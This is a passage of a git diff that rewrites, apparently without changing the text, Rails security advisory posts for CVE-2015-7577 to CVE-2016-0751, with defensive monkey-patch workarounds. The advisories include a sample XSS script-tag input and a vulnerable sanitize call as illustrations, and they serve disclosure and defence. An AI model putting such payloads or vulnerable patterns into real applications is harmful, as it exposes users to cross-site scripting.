+    password used in the basic authentication system.
+
+    You can tell you application is vulnerable to this attack by looking for
+    `http_basic_authenticate_with` method calls in your application.
+
+    All users running an affected release should either upgrade or use one of
+    the workarounds immediately.
+
+    Releases
+    --------
+    The FIXED releases are available at the normal locations.
+
+    Workarounds
+    -----------
+    If you can't upgrade, please use the following monkey patch in an initializer
+    that is loaded before your application:
+
+    ```
+    $ cat config/initializers/basic_auth_fix.rb
+    module ActiveSupport
+      module SecurityUtils
+        def secure_compare(a, b)
+          return false unless a.bytesize == b.bytesize
+
+          l = a.unpack "C#{a.bytesize}"
+
+          res = 0
+          b.each_byte { |byte| res |= byte ^ l.shift }
+          res == 0
+        end
+        module_function :secure_compare
+
+        def variable_size_secure_compare(a, b)
+          secure_compare(::Digest::SHA256.hexdigest(a), ::Digest::SHA256.hexdigest(b))
+        end
+        module_function :variable_size_secure_compare
+      end
+    end
+
+    module ActionController
+      class Base
+        def self.http_basic_authenticate_with(options = {})
+          before_action(options.except(:name, :password, :realm)) do
+            authenticate_or_request_with_http_basic(options[:realm] || "Application") do |name, password|
+              # This comparison uses & so that it doesn't short circuit and
+              # uses `variable_size_secure_compare` so that length information
+              # isn't leaked.
+              ActiveSupport::SecurityUtils.variable_size_secure_compare(name, options[:name]) &
+                ActiveSupport::SecurityUtils.variable_size_secure_compare(password, options[:password])
+            end
+          end
+        end
+      end
+    end
+    ```
+
+
+    Patches
+    -------
+    To aid users who aren't able to upgrade immediately we have provided patches for
+    the two supported release series. They are in git-am format and consist of a
+    single changeset.
+
+    * 4-1-basic_auth.patch - Patch for 4.1 series
+    * 4-2-basic_auth.patch - Patch for 4.2 series
+    * 5-0-basic_auth.patch - Patch for 5.0 series
+
+    Please note that only the 4.1.x and 4.2.x series are supported at present. Users
+    of earlier unsupported releases are advised to upgrade as soon as possible as we
+    cannot guarantee the continued availability of security fixes for unsupported
+    releases.
+
+    Credits
+    -------
+
+    Thank you to Daniel Waterworth for reporting the problem and working with us to
+    fix it.
+  cvss_v2: 4.3
+  cvss_v3: 3.7
+  patched_versions:
+  - ">= 5.0.0.beta1.1"
+  - "~> 4.2.5, >= 4.2.5.1"
+  - "~> 4.1.14, >= 4.1.14.1"
+  - "~> 3.2.22.1"
+---
diff --git a/advisories/_posts/2016-01-25-CVE-2015-7577.md b/advisories/_posts/2016-01-25-CVE-2015-7577.md
index 00f79707..48b02d9c 100644
--- a/advisories/_posts/2016-01-25-CVE-2015-7577.md
+++ b/advisories/_posts/2016-01-25-CVE-2015-7577.md
@@ -1,115 +1,115 @@
----
-layout: advisory
-title: 'CVE-2015-7577 (activerecord): Nested attributes rejection proc bypass in Active
-  Record'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2015-7577
-  ghsa: xrr6-3pc4-m447
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/cawsWcQ6c8g
-  title: Nested attributes rejection proc bypass in Active Record
-  date: 2016-01-25
-  description: |
-    There is a vulnerability in how the nested attributes feature in Active Record
-    handles updates in combination with destroy flags when destroying records is
-    disabled. This vulnerability has been assigned the CVE identifier CVE-2015-7577.
-
-    Versions Affected:  3.1.0 and newer
-    Not affected:       3.0.x and older
-    Fixed Versions:     5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1
-
-    Impact
-    ------
-    When using the nested attributes feature in Active Record you can prevent the
-    destruction of associated records by passing the `allow_destroy: false` option
-    to the `accepts_nested_attributes_for` method. However due to a change in the
-    commit [a9b4b5d][1] the `_destroy` flag prevents the `:reject_if` proc from
-    being called because it assumes that the record will be destroyed anyway.
-
-    However this isn't true if `:allow_destroy` is false so this leads to changes
-    that would have been rejected being applied to the record. Attackers could use
-    this do things like set attributes to invalid values and to clear all of the
-    attributes amongst other things. The severity will be dependent on how the
-    application has used this feature.
-
-    All users running an affected release should either upgrade or use one of
-    the workarounds immediately.
-
-    Releases
-    --------
-    The FIXED releases are available at the normal locations.
-
-    Workarounds
-    -----------
-    If you can't upgrade, please use the following monkey patch in an initializer
-    that is loaded before your application:
-
-    ```
-    $ cat config/initializers/nested_attributes_bypass_fix.rb
-    module ActiveRecord
-      module NestedAttributes
-        private
-
-        def reject_new_record?(association_name, attributes)
-          will_be_destroyed?(association_name, attributes) || call_reject_if(association_name, attributes)
-        end
-
-        def call_reject_if(association_name, attributes)
-          return false if will_be_destroyed?(association_name, attributes)
-
-          case callback = self.nested_attributes_options[association_name][:reject_if]
-          when Symbol
-            method(callback).arity == 0 ? send(callback) : send(callback, attributes)
-          when Proc
-            callback.call(attributes)
-          end
-        end
-
-        def will_be_destroyed?(association_name, attributes)
-          allow_destroy?(association_name) && has_destroy_flag?(attributes)
-        end
-
-        def allow_destroy?(association_name)
-          self.nested_attributes_options[association_name][:allow_destroy]
-        end
-      end
-    end
-    ```
-
-    Patches
-    -------
-    To aid users who aren't able to upgrade immediately we have provided patches for
-    the two supported release series. They are in git-am format and consist of a
-    single changeset.
-
-    * 3-2-nested-attributes-reject-if-bypass.patch - Patch for 3.2 series
-    * 4-1-nested-attributes-reject-if-bypass.patch - Patch for 4.1 series
-    * 4-2-nested-attributes-reject-if-bypass.patch - Patch for 4.2 series
-    * 5-0-nested-attributes-reject-if-bypass.patch - Patch for 5.0 series
-
-    Please note that only the 4.1.x and 4.2.x series are supported at present. Users
-    of earlier unsupported releases are advised to upgrade as soon as possible as we
-    cannot guarantee the continued availability of security fixes for unsupported
-    releases.
-
-    Credits
-    -------
-    Thank you to Justin Coyne for reporting the problem and working with us to fix it.
-
-    [1]: https://github.com/rails/rails/commit/a9b4b5da7c216e4464eeb9dbd0a39ea258d64325
-  cvss_v2: 5.0
-  cvss_v3: 5.3
-  unaffected_versions:
-  - "~> 3.0.0"
-  - "< 3.0.0"
-  patched_versions:
-  - ">= 5.0.0.beta1.1"
-  - "~> 4.2.5, >= 4.2.5.1"
-  - "~> 4.1.14, >= 4.1.14.1"
-  - "~> 3.2.22.1"
----
+---
+layout: advisory
+title: 'CVE-2015-7577 (activerecord): Nested attributes rejection proc bypass in Active
+  Record'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2015-7577
+  ghsa: xrr6-3pc4-m447
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/cawsWcQ6c8g
+  title: Nested attributes rejection proc bypass in Active Record
+  date: 2016-01-25
+  description: |
+    There is a vulnerability in how the nested attributes feature in Active Record
+    handles updates in combination with destroy flags when destroying records is
+    disabled. This vulnerability has been assigned the CVE identifier CVE-2015-7577.
+
+    Versions Affected:  3.1.0 and newer
+    Not affected:       3.0.x and older
+    Fixed Versions:     5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1
+
+    Impact
+    ------
+    When using the nested attributes feature in Active Record you can prevent the
+    destruction of associated records by passing the `allow_destroy: false` option
+    to the `accepts_nested_attributes_for` method. However due to a change in the
+    commit [a9b4b5d][1] the `_destroy` flag prevents the `:reject_if` proc from
+    being called because it assumes that the record will be destroyed anyway.
+
+    However this isn't true if `:allow_destroy` is false so this leads to changes
+    that would have been rejected being applied to the record. Attackers could use
+    this do things like set attributes to invalid values and to clear all of the
+    attributes amongst other things. The severity will be dependent on how the
+    application has used this feature.
+
+    All users running an affected release should either upgrade or use one of
+    the workarounds immediately.
+
+    Releases
+    --------
+    The FIXED releases are available at the normal locations.
+
+    Workarounds
+    -----------
+    If you can't upgrade, please use the following monkey patch in an initializer
+    that is loaded before your application:
+
+    ```
+    $ cat config/initializers/nested_attributes_bypass_fix.rb
+    module ActiveRecord
+      module NestedAttributes
+        private
+
+        def reject_new_record?(association_name, attributes)
+          will_be_destroyed?(association_name, attributes) || call_reject_if(association_name, attributes)
+        end
+
+        def call_reject_if(association_name, attributes)
+          return false if will_be_destroyed?(association_name, attributes)
+
+          case callback = self.nested_attributes_options[association_name][:reject_if]
+          when Symbol
+            method(callback).arity == 0 ? send(callback) : send(callback, attributes)
+          when Proc
+            callback.call(attributes)
+          end
+        end
+
+        def will_be_destroyed?(association_name, attributes)
+          allow_destroy?(association_name) && has_destroy_flag?(attributes)
+        end
+
+        def allow_destroy?(association_name)
+          self.nested_attributes_options[association_name][:allow_destroy]
+        end
+      end
+    end
+    ```
+
+    Patches
+    -------
+    To aid users who aren't able to upgrade immediately we have provided patches for
+    the two supported release series. They are in git-am format and consist of a
+    single changeset.
+
+    * 3-2-nested-attributes-reject-if-bypass.patch - Patch for 3.2 series
+    * 4-1-nested-attributes-reject-if-bypass.patch - Patch for 4.1 series
+    * 4-2-nested-attributes-reject-if-bypass.patch - Patch for 4.2 series
+    * 5-0-nested-attributes-reject-if-bypass.patch - Patch for 5.0 series
+
+    Please note that only the 4.1.x and 4.2.x series are supported at present. Users
+    of earlier unsupported releases are advised to upgrade as soon as possible as we
+    cannot guarantee the continued availability of security fixes for unsupported
+    releases.
+
+    Credits
+    -------
+    Thank you to Justin Coyne for reporting the problem and working with us to fix it.
+
+    [1]: https://github.com/rails/rails/commit/a9b4b5da7c216e4464eeb9dbd0a39ea258d64325
+  cvss_v2: 5.0
+  cvss_v3: 5.3
+  unaffected_versions:
+  - "~> 3.0.0"
+  - "< 3.0.0"
+  patched_versions:
+  - ">= 5.0.0.beta1.1"
+  - "~> 4.2.5, >= 4.2.5.1"
+  - "~> 4.1.14, >= 4.1.14.1"
+  - "~> 3.2.22.1"
+---
diff --git a/advisories/_posts/2016-01-25-CVE-2015-7578.md b/advisories/_posts/2016-01-25-CVE-2015-7578.md
index f0888eaf..bd12c8f9 100644
--- a/advisories/_posts/2016-01-25-CVE-2015-7578.md
+++ b/advisories/_posts/2016-01-25-CVE-2015-7578.md
@@ -1,53 +1,53 @@
----
-layout: advisory
-title: 'CVE-2015-7578 (rails-html-sanitizer): Possible XSS vulnerability in rails-html-sanitizer'
-comments: false
-categories:
-- rails-html-sanitizer
-advisory:
-  gem: rails-html-sanitizer
-  cve: 2015-7578
-  ghsa: 59c7-4xj2-hgvw
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/uh--W4TDwmI
-  title: Possible XSS vulnerability in rails-html-sanitizer
-  date: 2016-01-25
-  description: |
-    There is a possible XSS vulnerability in rails-html-sanitizer. This
-    vulnerability has been assigned the CVE identifier CVE-2015-7578.
-
-    Versions Affected:  All.
-    Not affected:       None.
-    Fixed Versions:     1.0.3
-
-    Impact
-    ------
-    There is a possible XSS vulnerability in rails-html-sanitizer.  Certain
-    attributes are not removed from tags when they are sanitized, and these
-    attributes can lead to an XSS attack on target applications.
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Releases
-    --------
-    The FIXED releases are available at the normal locations.
-
-    Workarounds
-    -----------
-    There are no feasible workarounds for this issue.
-
-    Patches
-    -------
-    To aid users who aren't able to upgrade immediately we have provided patches for
-    the two supported release series. They are in git-am format and consist of a
-    single changeset.
-
-    * 1-0-sanitize_data_attributes.patch - Patch for 1.0 series
-
-    Credits
-    -------
-    Thanks to Ben Murphy and Marien for reporting this.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 1.0.3"
----
+---
+layout: advisory
+title: 'CVE-2015-7578 (rails-html-sanitizer): Possible XSS vulnerability in rails-html-sanitizer'
+comments: false
+categories:
+- rails-html-sanitizer
+advisory:
+  gem: rails-html-sanitizer
+  cve: 2015-7578
+  ghsa: 59c7-4xj2-hgvw
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/uh--W4TDwmI
+  title: Possible XSS vulnerability in rails-html-sanitizer
+  date: 2016-01-25
+  description: |
+    There is a possible XSS vulnerability in rails-html-sanitizer. This
+    vulnerability has been assigned the CVE identifier CVE-2015-7578.
+
+    Versions Affected:  All.
+    Not affected:       None.
+    Fixed Versions:     1.0.3
+
+    Impact
+    ------
+    There is a possible XSS vulnerability in rails-html-sanitizer.  Certain
+    attributes are not removed from tags when they are sanitized, and these
+    attributes can lead to an XSS attack on target applications.
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Releases
+    --------
+    The FIXED releases are available at the normal locations.
+
+    Workarounds
+    -----------
+    There are no feasible workarounds for this issue.
+
+    Patches
+    -------
+    To aid users who aren't able to upgrade immediately we have provided patches for
+    the two supported release series. They are in git-am format and consist of a
+    single changeset.
+
+    * 1-0-sanitize_data_attributes.patch - Patch for 1.0 series
+
+    Credits
+    -------
+    Thanks to Ben Murphy and Marien for reporting this.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 1.0.3"
+---
diff --git a/advisories/_posts/2016-01-25-CVE-2015-7579.md b/advisories/_posts/2016-01-25-CVE-2015-7579.md
index bb5e2904..4bb3a925 100644
--- a/advisories/_posts/2016-01-25-CVE-2015-7579.md
+++ b/advisories/_posts/2016-01-25-CVE-2015-7579.md
@@ -1,80 +1,80 @@
----
-layout: advisory
-title: 'CVE-2015-7579 (rails-html-sanitizer): XSS vulnerability in rails-html-sanitizer'
-comments: false
-categories:
-- rails-html-sanitizer
-advisory:
-  gem: rails-html-sanitizer
-  cve: 2015-7579
-  ghsa: r9c2-cr39-c8g6
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/OU9ugTZcbjc
-  title: XSS vulnerability in rails-html-sanitizer
-  date: 2016-01-25
-  description: |
-    There is a XSS vulnerability in `Rails::Html::FullSanitizer` used by Action View's `strip_tags`.
-    This vulnerability has been assigned the CVE identifier CVE-2015-7579.
-
-    Versions Affected:  1.0.2
-    Not affected:       1.0.0, 1.0.1
-    Fixed Versions:     1.0.3
-
-    Impact
-    ------
-    Due to the way that `Rails::Html::FullSanitizer` is implemented, if an attacker
-    passes an already escaped HTML entity to the input of Action View's `strip_tags`
-    these entities will be unescaped what may cause a XSS attack if used in combination
-    with `raw` or `html_safe`.
-
-    For example:
-
-        strip_tags("&lt;script&gt;alert('XSS')&lt;/script&gt;")
-
-    Would generate:
-
-        <script>alert('XSS')</script>
-
-    After the fix it will generate:
-
-        &lt;script&gt;alert('XSS')&lt;/script&gt;
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Releases
-    --------
-    The FIXED releases are available at the normal locations.
-
-    Workarounds
-    -----------
-    If you can't upgrade, please use the following monkey patch in an initializer
-    that is loaded before your application:
-
-    ```
-    $ cat config/initializers/strip_tags_fix.rb
-    class ActionView::Base
-      def strip_tags(html)
-        self.class.full_sanitizer.sanitize(html)
-      end
-    end
-    ```
-
-    Patches
-    -------
-    To aid users who aren't able to upgrade immediately we have provided patches
-    for the two supported release series. They are in git-am format and consist
-    of a single changeset.
-
-    * Do-not-unescape-already-escaped-HTML-entities.patch
-
-    Credits
-    -------
-    Thank you to Arthur Neves from GitHub and Spyros Livathinos from Zendesk for
-    reporting the problem and working with us to fix it.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "~> 1.0.0"
-  - "~> 1.0.1"
-  patched_versions:
-  - ">= 1.0.3"
----
+---
+layout: advisory
+title: 'CVE-2015-7579 (rails-html-sanitizer): XSS vulnerability in rails-html-sanitizer'
+comments: false
+categories:
+- rails-html-sanitizer
+advisory:
+  gem: rails-html-sanitizer
+  cve: 2015-7579
+  ghsa: r9c2-cr39-c8g6
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/OU9ugTZcbjc
+  title: XSS vulnerability in rails-html-sanitizer
+  date: 2016-01-25
+  description: |
+    There is a XSS vulnerability in `Rails::Html::FullSanitizer` used by Action View's `strip_tags`.
+    This vulnerability has been assigned the CVE identifier CVE-2015-7579.
+
+    Versions Affected:  1.0.2
+    Not affected:       1.0.0, 1.0.1
+    Fixed Versions:     1.0.3
+
+    Impact
+    ------
+    Due to the way that `Rails::Html::FullSanitizer` is implemented, if an attacker
+    passes an already escaped HTML entity to the input of Action View's `strip_tags`
+    these entities will be unescaped what may cause a XSS attack if used in combination
+    with `raw` or `html_safe`.
+
+    For example:
+
+        strip_tags("&lt;script&gt;alert('XSS')&lt;/script&gt;")
+
+    Would generate:
+
+        <script>alert('XSS')</script>
+
+    After the fix it will generate:
+
+        &lt;script&gt;alert('XSS')&lt;/script&gt;
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Releases
+    --------
+    The FIXED releases are available at the normal locations.
+
+    Workarounds
+    -----------
+    If you can't upgrade, please use the following monkey patch in an initializer
+    that is loaded before your application:
+
+    ```
+    $ cat config/initializers/strip_tags_fix.rb
+    class ActionView::Base
+      def strip_tags(html)
+        self.class.full_sanitizer.sanitize(html)
+      end
+    end
+    ```
+
+    Patches
+    -------
+    To aid users who aren't able to upgrade immediately we have provided patches
+    for the two supported release series. They are in git-am format and consist
+    of a single changeset.
+
+    * Do-not-unescape-already-escaped-HTML-entities.patch
+
+    Credits
+    -------
+    Thank you to Arthur Neves from GitHub and Spyros Livathinos from Zendesk for
+    reporting the problem and working with us to fix it.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "~> 1.0.0"
+  - "~> 1.0.1"
+  patched_versions:
+  - ">= 1.0.3"
+---
diff --git a/advisories/_posts/2016-01-25-CVE-2015-7580.md b/advisories/_posts/2016-01-25-CVE-2015-7580.md
index d2f58836..5cb8ac2d 100644
--- a/advisories/_posts/2016-01-25-CVE-2015-7580.md
+++ b/advisories/_posts/2016-01-25-CVE-2015-7580.md
@@ -1,76 +1,76 @@
----
-layout: advisory
-title: 'CVE-2015-7580 (rails-html-sanitizer): Possible XSS vulnerability in rails-html-sanitizer'
-comments: false
-categories:
-- rails-html-sanitizer
-advisory:
-  gem: rails-html-sanitizer
-  cve: 2015-7580
-  ghsa: ghqm-pgxj-37gq
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/uh--W4TDwmI
-  title: Possible XSS vulnerability in rails-html-sanitizer
-  date: 2016-01-25
-  description: |
-    There is a possible XSS vulnerability in the white list sanitizer in the
-    rails-html-sanitizer gem. This vulnerability has been assigned the CVE
-    identifier CVE-2015-7580.
-
-    Versions Affected:  All.
-    Not affected:       None.
-    Fixed Versions:     v1.0.3
-
-    Impact
-    ------
-    Carefully crafted strings can cause user input to bypass the sanitization in
-    the white list sanitizer which will can lead to an XSS attack.
-
-    Vulnerable code will look something like this:
-
-      <%= sanitize user_input, tags: %w(em) %>
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Releases
-    --------
-    The FIXED releases are available at the normal locations.
-
-    Workarounds
-    -----------
-    Putting the following monkey patch in an initializer can help to mitigate the
-    issue:
-
-    ```
-    class Rails::Html::PermitScrubber
-      alias :old_scrub :scrub
-      alias :old_skip_node? :skip_node?
-
-      def scrub(node)
-        if node.cdata?
-          text = node.document.create_text_node node.text
-          node.replace text
-          return CONTINUE
-        end
-        old_scrub node
-      end
-
-      def skip_node?(node); node.text?; end
-    end
-    ```
-
-    Patches
-    -------
-    To aid users who aren't able to upgrade immediately we have provided patches for
-    the two supported release series. They are in git-am format and consist of a
-    single changeset.
-
-    * 1-0-whitelist_sanitizer_xss.patch - Patch for 1.0 series
-
-    Credits
-    -------
-    Thanks to Arnaud Germis, Nate Clark, and John Colvin for reporting this issue.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 1.0.3"
----
+---
+layout: advisory
+title: 'CVE-2015-7580 (rails-html-sanitizer): Possible XSS vulnerability in rails-html-sanitizer'
+comments: false
+categories:
+- rails-html-sanitizer
+advisory:
+  gem: rails-html-sanitizer
+  cve: 2015-7580
+  ghsa: ghqm-pgxj-37gq
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/uh--W4TDwmI
+  title: Possible XSS vulnerability in rails-html-sanitizer
+  date: 2016-01-25
+  description: |
+    There is a possible XSS vulnerability in the white list sanitizer in the
+    rails-html-sanitizer gem. This vulnerability has been assigned the CVE
+    identifier CVE-2015-7580.
+
+    Versions Affected:  All.
+    Not affected:       None.
+    Fixed Versions:     v1.0.3
+
+    Impact
+    ------
+    Carefully crafted strings can cause user input to bypass the sanitization in
+    the white list sanitizer which will can lead to an XSS attack.
+
+    Vulnerable code will look something like this:
+
+      <%= sanitize user_input, tags: %w(em) %>
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Releases
+    --------
+    The FIXED releases are available at the normal locations.
+
+    Workarounds
+    -----------
+    Putting the following monkey patch in an initializer can help to mitigate the
+    issue:
+
+    ```
+    class Rails::Html::PermitScrubber
+      alias :old_scrub :scrub
+      alias :old_skip_node? :skip_node?
+
+      def scrub(node)
+        if node.cdata?
+          text = node.document.create_text_node node.text
+          node.replace text
+          return CONTINUE
+        end
+        old_scrub node
+      end
+
+      def skip_node?(node); node.text?; end
+    end
+    ```
+
+    Patches
+    -------
+    To aid users who aren't able to upgrade immediately we have provided patches for
+    the two supported release series. They are in git-am format and consist of a
+    single changeset.
+
+    * 1-0-whitelist_sanitizer_xss.patch - Patch for 1.0 series
+
+    Credits
+    -------
+    Thanks to Arnaud Germis, Nate Clark, and John Colvin for reporting this issue.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 1.0.3"
+---
diff --git a/advisories/_posts/2016-01-25-CVE-2015-7581.md b/advisories/_posts/2016-01-25-CVE-2015-7581.md
index af761bd4..814e81c3 100644
--- a/advisories/_posts/2016-01-25-CVE-2015-7581.md
+++ b/advisories/_posts/2016-01-25-CVE-2015-7581.md
@@ -1,62 +1,62 @@
----
-layout: advisory
-title: 'CVE-2015-7581 (actionpack): Object leak vulnerability for wildcard controller
-  routes in Action Pack'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2015-7581
-  ghsa: 9h6g-gp95-x3q5
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/dthJ5wL69JE
-  title: Object leak vulnerability for wildcard controller routes in Action Pack
-  date: 2016-01-25
-  description: |
-    There is an object leak vulnerability for wildcard controllers in Action Pack.
-    This vulnerability has been assigned the CVE identifier CVE-2015-7581.
-
-    Versions Affected:  >= 4.0.0 and < 5.0.0.beta1
-    Not affected:       < 4.0.0, 5.0.0.beta1 and newer
-    Fixed Versions:     4.2.5.1, 4.1.14.1
-
-    Impact
-    ------
-    Users that have a route that contains the string ":controller" are susceptible
-    to objects being leaked globally which can lead to unbounded memory growth.
-    To identify if your application is vulnerable, look for routes that contain
-    ":controller".
-
-    Internally, Action Pack keeps a map of "url controller name" to "controller
-    class name".  This map is cached globally, and is populated even if the
-    controller class doesn't actually exist.
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Releases
-    --------
-    The FIXED releases are available at the normal locations.
-
-    Workarounds
-    -----------
-    There are no feasible workarounds for this issue.
-
-    Patches
-    -------
-    To aid users who aren't able to upgrade immediately we have provided patches for the two supported release series.  They are in git-am format and consist of a single changeset.
-
-    * 4-1-wildcard_route.patch - Patch for 4.1 series
-    * 4-2-wildcard_route.patch - Patch for 4.2 series
-
-    Please note that only the 4.1.x and 4.2.x series are supported at present.  Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 4.0.0"
-  - ">= 5.0.0.beta1"
-  patched_versions:
-  - "~> 4.2.5, >= 4.2.5.1"
-  - "~> 4.1.14, >= 4.1.14.1"
----
+---
+layout: advisory
+title: 'CVE-2015-7581 (actionpack): Object leak vulnerability for wildcard controller
+  routes in Action Pack'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2015-7581
+  ghsa: 9h6g-gp95-x3q5
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/dthJ5wL69JE
+  title: Object leak vulnerability for wildcard controller routes in Action Pack
+  date: 2016-01-25
+  description: |
+    There is an object leak vulnerability for wildcard controllers in Action Pack.
+    This vulnerability has been assigned the CVE identifier CVE-2015-7581.
+
+    Versions Affected:  >= 4.0.0 and < 5.0.0.beta1
+    Not affected:       < 4.0.0, 5.0.0.beta1 and newer
+    Fixed Versions:     4.2.5.1, 4.1.14.1
+
+    Impact
+    ------
+    Users that have a route that contains the string ":controller" are susceptible
+    to objects being leaked globally which can lead to unbounded memory growth.
+    To identify if your application is vulnerable, look for routes that contain
+    ":controller".
+
+    Internally, Action Pack keeps a map of "url controller name" to "controller
+    class name".  This map is cached globally, and is populated even if the
+    controller class doesn't actually exist.
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Releases
+    --------
+    The FIXED releases are available at the normal locations.
+
+    Workarounds
+    -----------
+    There are no feasible workarounds for this issue.
+
+    Patches
+    -------
+    To aid users who aren't able to upgrade immediately we have provided patches for the two supported release series.  They are in git-am format and consist of a single changeset.
+
+    * 4-1-wildcard_route.patch - Patch for 4.1 series
+    * 4-2-wildcard_route.patch - Patch for 4.2 series
+
+    Please note that only the 4.1.x and 4.2.x series are supported at present.  Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 4.0.0"
+  - ">= 5.0.0.beta1"
+  patched_versions:
+  - "~> 4.2.5, >= 4.2.5.1"
+  - "~> 4.1.14, >= 4.1.14.1"
+---
diff --git a/advisories/_posts/2016-01-25-CVE-2016-0751.md b/advisories/_posts/2016-01-25-CVE-2016-0751.md
index b5dc1c85..428e67fb 100644
--- a/advisories/_posts/2016-01-25-CVE-2016-0751.md
+++ b/advisories/_posts/2016-01-25-CVE-2016-0751.md
@@ -1,80 +1,80 @@
----
-layout: advisory
-title: 'CVE-2016-0751 (actionpack): Possible Object Leak and Denial of Service attack
-  in Action Pack'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2016-0751
-  ghsa: ffpv-c4hm-3x6v
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/9oLY_FCzvoc
-  title: Possible Object Leak and Denial of Service attack in Action Pack
-  date: 2016-01-25
-  description: |
-    There is a possible object leak which can lead to a denial of service
-    vulnerability in Action Pack. This vulnerability has been
-    assigned the CVE identifier CVE-2016-0751.
-
-    Versions Affected:  All.
-    Not affected:       None.
-    Fixed Versions:     5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1
-
-    Impact
-    ------
-    A carefully crafted accept header can cause a global cache of mime types to
-    grow indefinitely which can lead to a possible denial of service attack in
-    Action Pack.
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Releases
-    --------
-    The FIXED releases are available at the normal locations.
-
-    Workarounds
-    -----------
-    This attack can be mitigated by a proxy that only allows known mime types in
-    the Accept header.
-
-    Placing the following code in an initializer will also mitigate the issue:
-
-    ```ruby
-    require 'action_dispatch/http/mime_type'
-
-    Mime.const_set :LOOKUP, Hash.new { |h,k|
-      Mime::Type.new(k) unless k.blank?
-    }
-    ```
-
-    Patches
-    -------
-    To aid users who aren't able to upgrade immediately we have provided patches for
-    the two supported release series. They are in git-am format and consist of a
-    single changeset.
-
-    * 5-0-mime_types_leak.patch - Patch for 5.0 series
-    * 4-2-mime_types_leak.patch - Patch for 4.2 series
-    * 4-1-mime_types_leak.patch - Patch for 4.1 series
-    * 3-2-mime_types_leak.patch - Patch for 3.2 series
-
-    Please note that only the 4.1.x and 4.2.x series are supported at present. Users
-    of earlier unsupported releases are advised to upgrade as soon as possible as we
-    cannot guarantee the continued availability of security fixes for unsupported
-    releases.
-
-    Credits
-    -------
-    Aaron Patterson <3<3
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 5.0.0.beta1.1"
-  - "~> 4.2.5, >= 4.2.5.1"
-  - "~> 4.1.14, >= 4.1.14.1"
-  - "~> 3.2.22.1"
----
+---
+layout: advisory
+title: 'CVE-2016-0751 (actionpack): Possible Object Leak and Denial of Service attack
+  in Action Pack'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2016-0751
+  ghsa: ffpv-c4hm-3x6v
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/9oLY_FCzvoc
+  title: Possible Object Leak and Denial of Service attack in Action Pack
+  date: 2016-01-25
+  description: |
+    There is a possible object leak which can lead to a denial of service
+    vulnerability in Action Pack. This vulnerability has been
+    assigned the CVE identifier CVE-2016-0751.
+
+    Versions Affected:  All.
+    Not affected:       None.
+    Fixed Versions:     5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1
+
+    Impact
+    ------
+    A carefully crafted accept header can cause a global cache of mime types to
+    grow indefinitely which can lead to a possible denial of service attack in
+    Action Pack.
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Releases
+    --------
+    The FIXED releases are available at the normal locations.
+
+    Workarounds
+    -----------
+    This attack can be mitigated by a proxy that only allows known mime types in
+    the Accept header.
+
+    Placing the following code in an initializer will also mitigate the issue:
+
+    ```ruby
+    require 'action_dispatch/http/mime_type'
+
+    Mime.const_set :LOOKUP, Hash.new { |h,k|
+      Mime::Type.new(k) unless k.blank?
+    }
+    ```
+
+    Patches
+    -------
+    To aid users who aren't able to upgrade immediately we have provided patches for
+    the two supported release series. They are in git-am format and consist of a
+    single changeset.
+
+    * 5-0-mime_types_leak.patch - Patch for 5.0 series
+    * 4-2-mime_types_leak.patch - Patch for 4.2 series
+    * 4-1-mime_types_leak.patch - Patch for 4.1 series
+    * 3-2-mime_types_leak.patch - Patch for 3.2 series
+
+    Please note that only the 4.1.x and 4.2.x series are supported at present. Users
+    of earlier unsupported releases are advised to upgrade as soon as possible as we
+    cannot guarantee the continued availability of security fixes for unsupported
+    releases.
+
+    Credits
+    -------
+    Aaron Patterson <3<3
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  patched_versions:
